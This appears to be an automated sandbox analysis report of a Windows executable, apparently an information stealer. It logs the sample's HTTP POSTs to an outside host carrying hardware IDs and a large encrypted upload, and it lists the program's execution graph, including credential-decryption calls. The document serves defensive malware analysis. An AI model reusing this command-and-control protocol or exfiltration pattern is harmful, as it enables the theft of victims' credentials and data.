                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:09 UTC1248OUTData Raw: 2d 2d 36 4f 50 4d 4d 33 33 53 49 31 30 59 44 4d 4b 44 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 38 43 35 38 32 37 39 43 41 45 31 37 35 35 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 36 4f 50 4d 4d 33 33 53 49 31 30 59 44 4d 4b 44 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4f 50 4d 4d 33 33 53 49 31 30 59 44 4d 4b 44 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                      Data Ascii: --6OPMM33SI10YDMKDTMContent-Disposition: form-data; name="hwid"0E8C58279CAE175520A4C476FD51BCB1--6OPMM33SI10YDMKDTMContent-Disposition: form-data; name="pid"1--6OPMM33SI10YDMKDTMContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                      2024-12-31 08:43:09 UTC1133INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=to5tn469fkmpcl0702hefn8hmo; expires=Sat, 26 Apr 2025 02:29:48 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S0%2Be1TumCJDHoNijgjxF4h%2FV5LlIwZQ4CpM%2FkTzVhrjwmxxm1stW5IbjaKdI0ini37Z5cCYMSrUErG7IHcnV34rQ9Kgv1UQumB9z1oYZ3Sdj0nDMcyOhP3qZXcPDKkv2k1Y1UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8faf69c0943b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=21894&min_rtt=1615&rtt_var=12732&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2166&delivery_rate=1808049&cwnd=203&unsent_bytes=0&cid=4bbf4144e9f732d7&ts=433&x=0"
                                                                                      2024-12-31 08:43:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-31 08:43:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.449736104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:10 UTC280OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=N4Y16TNE0FZYKU
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 569055
                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: 2d 2d 4e 34 59 31 36 54 4e 45 30 46 5a 59 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 38 43 35 38 32 37 39 43 41 45 31 37 35 35 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4e 34 59 31 36 54 4e 45 30 46 5a 59 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 34 59 31 36 54 4e 45 30 46 5a 59 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4e 34 59 31 36 54 4e 45
                                                                                      Data Ascii: --N4Y16TNE0FZYKUContent-Disposition: form-data; name="hwid"0E8C58279CAE175520A4C476FD51BCB1--N4Y16TNE0FZYKUContent-Disposition: form-data; name="pid"1--N4Y16TNE0FZYKUContent-Disposition: form-data; name="lid"PsFKDg--pablo--N4Y16TNE
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c 2a c5 0d fd 46 28 1f 93 e4 73 26 f1 99 d9 69 ad ab 2b 90 53 3b
                                                                                      Data Ascii: Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j*\9-Wi]ORQk-*F(s&i+S;
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 34 a1 5d 4b 6e 50 af a3 c4 af 22 bd 6f 25 04 13 2f 29 37 c1 4b
                                                                                      Data Ascii: K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F4]KnP"o%/)7K
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb 9d 50 43 e6 e7 5c 22 14 34 2d 65 fb 72 3c 9c 74 b1 84 4d 01 a5
                                                                                      Data Ascii: oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?PC\"4-er<tM
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 17 ef ff ad a2 f8 ff be 20 38 1b 09 8f 04 70 89 8a 8c 6d 08 3e
                                                                                      Data Ascii: )`"yDe\^s+Fh!C##0u^~ESc 7Ba5*<Dt[@|M5"5*}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~*x6m^*|.To(1 8pm>
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 f5 88 b6 1e 48 af 0f a3 50 eb 70 99 b6 3f a6 b4 da a6 58 36 bc
                                                                                      Data Ascii: un]%,un!"__]-CJ BOLy|vyTvs~8kQ*gi0(4RwVf"BM=a)c[eg0'mZFwA*!9-H`l`?DTjtJ24a)*STYHPp?X6
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 ec 67 5f c6 cc 26 6f 2d 41 61 14 2e 83 fc c3 e4 0c 67 f7 dd 60
                                                                                      Data Ascii: 6K*ngzb,ha"C@95mueu5@7O~1zM1j;N"3#I|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv|g_&o-Aa.g`
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: a3 db 7f 22 8c 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09 9a 94 61 20 e1 7a 03 b0 63 dc 9b fa 1d 20 4f 38 c2 5e 14 50 f3 e5 de b5 ae 2a 7b
                                                                                      Data Ascii: "^l'(K>xA>\3q?gpe-EZ|1sHJf=;}*hswOqo=7Kpgm.;bA>(eZGh?*~--0]>q$e-nKR2&yJa zc O8^P*{
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: 40 68 ec 79 c7 aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb 30 6d 30 59 75 9c a9 3f be 7e 26 2a 34 40 64 40 28 59 e9 c7 cc 49 13 d3 9a 4e 83
                                                                                      Data Ascii: @hy6[{r|A:o!f=U-T*vA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.*n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI0m0Yu?~&*4@d@(YIN
                                                                                      2024-12-31 08:43:10 UTC15331OUTData Raw: da 27 9a 6e 1e f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2 37 8b e0 5d 5d 91 8f 89 ec 91 cf 0b 6b 62 f9 97 67 99 1a a3 01 79 9d 6a ce 27 64
                                                                                      Data Ascii: 'nce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>|b^0l7]]kbgyj'd
                                                                                      2024-12-31 08:43:13 UTC1145INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:13 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=9s75eunm7mg6l3f05889ijh5mp; expires=Sat, 26 Apr 2025 02:29:50 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18RW9OT31w4Ac%2FIe%2Fq8zm%2FC2jyYrQoPqk5FtL%2Bd5eP4LRvaLmQmfw%2BZnbjJCpQX9tMsBBFGbydxC%2Bw1unQ1QlcpyPnnK7jcV6n0WO685XQ708zvoDI1mTtWp%2BH3Z6fcqf3OsSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fafeef48c34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1471&rtt_var=566&sent=339&recv=590&lost=0&retrans=0&sent_bytes=2844&recv_bytes=571599&delivery_rate=1907250&cwnd=181&unsent_bytes=0&cid=c9e0d0b559c18b80&ts=3318&x=0"


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:03:42:58
                                                                                      Start date:31/12/2024
                                                                                      Path:C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\x6VtGfW26X.exe"
                                                                                      Imagebase:0x7b0000
                                                                                      File size:1'883'648 bytes
                                                                                      MD5 hash:C17D20E6BE092651357A8B466257B795
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:63.6%
                                                                                        Total number of Nodes:280
                                                                                        Total number of Limit Nodes:23
                                                                                        execution_graph 20499 7bd6f8 20500 7bd720 20499->20500 20503 7e8860 20500->20503 20502 7bd88d 20502->20502 20504 7e8890 20503->20504 20504->20504 20506 7e8b5b SysAllocString 20504->20506 20509 7e8ebb 20504->20509 20505 7e8ee5 GetVolumeInformationW 20511 7e8f03 20505->20511 20507 7e8b83 20506->20507 20508 7e8b8b CoSetProxyBlanket 20507->20508 20507->20509 20508->20509 20510 7e8bab 20508->20510 20509->20505 20512 7e8ea9 SysFreeString SysFreeString 20510->20512 20511->20502 20512->20509 20836 8097c5 VirtualAlloc 20837 8097d9 20836->20837 20843 7e16b2 CoSetProxyBlanket 20513 7c8df1 20514 7c8fbd 20513->20514 20515 7c8dfd 20513->20515 20517 7f0ba0 20515->20517 20518 7f0bc0 20517->20518 20520 7f0d1e 20518->20520 20521 7ed910 LdrInitializeThunk 20518->20521 20520->20514 20521->20520 20522 7e84f0 20523 7e8515 20522->20523 20526 7e85f2 20523->20526 20531 7ed910 LdrInitializeThunk 20523->20531 20524 7e87f0 20526->20524 20528 7e86e7 20526->20528 20530 7ed910 LdrInitializeThunk 20526->20530 20528->20524 20532 7ed910 LdrInitializeThunk 20528->20532 20530->20526 20531->20523 20532->20528 20844 7b9cae 20845 7b9cb6 WSAStartup 20844->20845 20538 7edce9 20540 7edd10 20538->20540 20539 7edd6e 20542 7ee21e 20539->20542 20545 7ed910 LdrInitializeThunk 20539->20545 20540->20539 20544 7ed910 LdrInitializeThunk 20540->20544 20542->20542 20544->20539 20545->20542 20551 7c9362 20554 7c933a 20551->20554 20553 7c97d1 CryptUnprotectData 20553->20554 20554->20551 20554->20553 20555 7ed910 LdrInitializeThunk 20554->20555 20555->20554 20556 7ebce0 20557 7ebd00 20556->20557 20558 7ebd5e 20557->20558 20566 7ed910 LdrInitializeThunk 20557->20566 20559 7ebf5e 20558->20559 20567 7ebc90 20558->20567 20563 7ebe0f 20565 7ebe8f 20563->20565 20570 7ed910 LdrInitializeThunk 20563->20570 20571 7ebcb0 20565->20571 20566->20558 20575 7ef000 20567->20575 20569 7ebc9a RtlAllocateHeap 20569->20563 20570->20565 20572 7ebcd4 20571->20572 20573 7ebcc3 20571->20573 20572->20559 20574 7ebcc8 RtlFreeHeap 20573->20574 20574->20572 20576 7ef010 20575->20576 20576->20569 20576->20576 20846 809e5e 20847 80a082 VirtualAlloc 20846->20847 20577 7e5edd 20578 7e5f00 20577->20578 20579 7e5f47 20578->20579 20581 7ed910 LdrInitializeThunk 20578->20581 20581->20578 20848 7ee19a 20850 7ee1a2 20848->20850 20849 7ee21e 20850->20849 20852 7ed910 LdrInitializeThunk 20850->20852 20852->20849 20582 7b9d5e 20583 7b9d80 20582->20583 20583->20583 20584 7b9e16 LoadLibraryExW 20583->20584 20585 7b9e27 20584->20585 20853 7bc69e CoInitializeSecurity 20586 7bd9d4 20588 7bda70 20586->20588 20587 7bdabe 20588->20587 20590 7ed910 LdrInitializeThunk 20588->20590 20590->20587 20591 7db94d 20592 7db959 GetComputerNameExA 20591->20592 20594 7d29cd 20595 7d2aa0 20594->20595 20598 7d29e0 20594->20598 20596 7d2d9c 20597 7d2def 20596->20597 20599 7d31c0 RtlExpandEnvironmentStrings 20596->20599 20598->20595 20602 7d2b58 20598->20602 20603 7d2fcf 20598->20603 20600 7d3210 20599->20600 20600->20600 20601 7d35e1 20600->20601 20607 7d32b4 20600->20607 20608 7d328c RtlExpandEnvironmentStrings 20600->20608 20609 7d3448 20600->20609 20610 7d32dc 20600->20610 20612 7d3420 20600->20612 20614 7d1060 20601->20614 20602->20596 20602->20597 20629 7ed910 LdrInitializeThunk 20602->20629 20630 7ed910 LdrInitializeThunk 20603->20630 20608->20601 20608->20607 20608->20609 20608->20610 20608->20612 20613 7f0ba0 LdrInitializeThunk 20609->20613 20611 7f0ba0 LdrInitializeThunk 20610->20611 20611->20612 20612->20601 20612->20607 20612->20609 20613->20607 20631 7f09e0 20614->20631 20616 7d184f 20616->20607 20617 7d10a3 20617->20616 20618 7ebc90 RtlAllocateHeap 20617->20618 20619 7d10e1 20618->20619 20628 7d1199 20619->20628 20635 7ed910 LdrInitializeThunk 20619->20635 20621 7d1789 20622 7ebcb0 RtlFreeHeap 20621->20622 20624 7d179b 20622->20624 20623 7ebc90 RtlAllocateHeap 20623->20628 20624->20616 20637 7ed910 LdrInitializeThunk 20624->20637 20627 7ebcb0 RtlFreeHeap 20627->20628 20628->20621 20628->20623 20628->20627 20636 7ed910 LdrInitializeThunk 20628->20636 20629->20602 20630->20597 20633 7f0a00 20631->20633 20632 7f0b4e 20632->20617 20633->20632 20638 7ed910 LdrInitializeThunk 20633->20638 20635->20619 20636->20628 20637->20624 20638->20632 20854 7dde0c 20857 7c4110 20854->20857 20856 7dde11 CoSetProxyBlanket 20857->20856 20639 7bde48 20643 7b95a0 20639->20643 20641 7bde54 CoUninitialize 20642 7bde80 20641->20642 20644 7b95b4 20643->20644 20644->20641 20645 7bdc41 20646 7bdc51 20645->20646 20671 7d37d0 20646->20671 20648 7bdc77 20684 7d3a60 20648->20684 20650 7bdc97 20697 7d5850 20650->20697 20656 7bdcc9 20732 7d7cb0 20656->20732 20658 7bdcf2 20659 7d37d0 5 API calls 20658->20659 20660 7bdd56 20659->20660 20661 7d3a60 4 API calls 20660->20661 20662 7bdd76 20661->20662 20663 7d5850 4 API calls 20662->20663 20664 7bdd96 20663->20664 20665 7d6000 3 API calls 20664->20665 20666 7bdd9f 20665->20666 20667 7d6340 3 API calls 20666->20667 20668 7bdda8 20667->20668 20669 7d7cb0 3 API calls 20668->20669 20670 7bddd1 20669->20670 20672 7d3860 20671->20672 20672->20672 20673 7d3876 RtlExpandEnvironmentStrings 20672->20673 20675 7d38c0 20673->20675 20676 7d395e 20675->20676 20678 7d3bf1 20675->20678 20679 7d3939 RtlExpandEnvironmentStrings 20675->20679 20682 7d3a3b 20675->20682 20745 7efe20 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20675->20745 20744 7cef80 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20676->20744 20746 7efb80 20678->20746 20679->20675 20679->20676 20679->20678 20679->20682 20681 7d3c2a 20681->20682 20756 7efa50 20681->20756 20682->20648 20685 7d3a6e 20684->20685 20686 7efa50 LdrInitializeThunk 20685->20686 20688 7d3922 20686->20688 20689 7d395e 20688->20689 20690 7d3bf1 20688->20690 20693 7d3939 RtlExpandEnvironmentStrings 20688->20693 20694 7d3a3b 20688->20694 20764 7efe20 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20688->20764 20763 7cef80 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20689->20763 20692 7efb80 3 API calls 20690->20692 20695 7d3c2a 20692->20695 20693->20688 20693->20689 20693->20690 20693->20694 20694->20650 20695->20694 20696 7efa50 LdrInitializeThunk 20695->20696 20696->20695 20698 7d5876 20697->20698 20699 7d5ad0 20697->20699 20706 7bdcb7 20697->20706 20707 7d5b04 20697->20707 20698->20699 20703 7efa50 LdrInitializeThunk 20698->20703 20698->20706 20698->20707 20784 7efe20 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20698->20784 20765 7ed880 20699->20765 20701 7efa50 LdrInitializeThunk 20701->20707 20703->20698 20704 7efb80 3 API calls 20704->20707 20709 7d6000 20706->20709 20707->20701 20707->20704 20707->20706 